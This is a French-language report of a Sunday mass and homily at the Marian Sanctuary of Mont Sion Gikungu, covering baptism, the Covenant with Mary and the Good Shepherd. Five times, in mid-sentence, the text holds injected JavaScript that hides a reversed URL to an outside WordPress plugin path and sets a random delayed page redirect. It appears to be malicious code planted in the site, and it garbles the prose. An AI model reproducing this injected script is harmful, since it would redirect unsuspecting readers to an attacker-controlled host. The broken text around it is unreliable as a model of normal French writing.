Au milieu de quatre prêtres, le Recteur du Sanctuaire Marial de Mont Sion Gikungu, Père Herménégilde COYITUNGIYE a célébré la messe de ce seizième Dimanche du Temps Ordinaire, un dimanche qui tombe le 18 date à laquelle chaque mois les Schoenstattiens renouvellent leur Alliance d’Amour avec la Mère Trois fois Admirable. Il a commencé par accueillir les chrétiens selon leurs catégories. Dans son mot d’accueil, il a dit que Jésus est parmi les chrétiens, qu’ il dit toujours:  » J’ai désir ardemment vous voir vous aimer les uns les autres. C’est Jésus qui a détruit le Mur qui sépara les chrétiens et les Païens. Dans son Homélie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la première lecture a été tirée du livre de Jérémie (23,1-6), du psaume 22(23)1-3a,3b-4,5,6; de la deuxième lecture de l’épître de Saint Paul aux Ephésiens 2,13-18 et enfin de l’Evangile selon Mark 6:30-34, le  Recteur du Sanctuaire a expliqué aux fidèles comment le Sang de Jésus Christ leur a approché de Dieu alors que avant ce n’était pas le cas. C’est le baptême qui vous a changé. Le baptême vous a introduit dans la communion avec Dieu, a-t-il continué. Nous qui sommes présents, nous renouvelons notre Alliance avec la Vierge Marie le 18 de chaque mois. A quoi sert cette Alliance avec Marie?, s’est-il demandé le célébrant. L’Alliance avec Marie nous interpelle le baptême, le baptême nous unit avec la Sainte Trinité. Celui qui a introduit l’Alliance nous montre la signification de l’Alliance. C’est dans  l’Alliance où est né le Bon Berger. L’Alliance avec Dieu dans le Bâpteme peut se subdiviser en deux points :

Premièrement, dans l’Alliance avec Dieu nous recevons la Mission que nous aurons le temps de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner le rapport.

Deuxièmement, en se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant aux autres comme Jésus sur la Croix nous mettons en pratique l’Alliance. Jésus, en se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant sur la Croix, a uni tout le monde. C’est le mystère de la foi. Aujourd’hui, Jésus guérit les chrétiens à travers l’Alliance, il détruit le  mur qui séparé les gens. Nous pouvons nous demander si Jésus peut venir détruire les murs qui nous séparent. Le Père COYITUNGIYE, en répondant à cette question, a montré que Jésus travaille avec chacun d’entre nous, c’est à dire qu’il ne le fait pas de ses propres mains mais qu’il nous charge de cette destruction. Pour terminer son homélie, Le Recteur a invité les fidèles à être conscient, à changer, à être de bons bergers. La Lumière de l’Évangile nous éclaire, chacun toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être le bon Berger chez lui.

Léonce SHIRAMBERE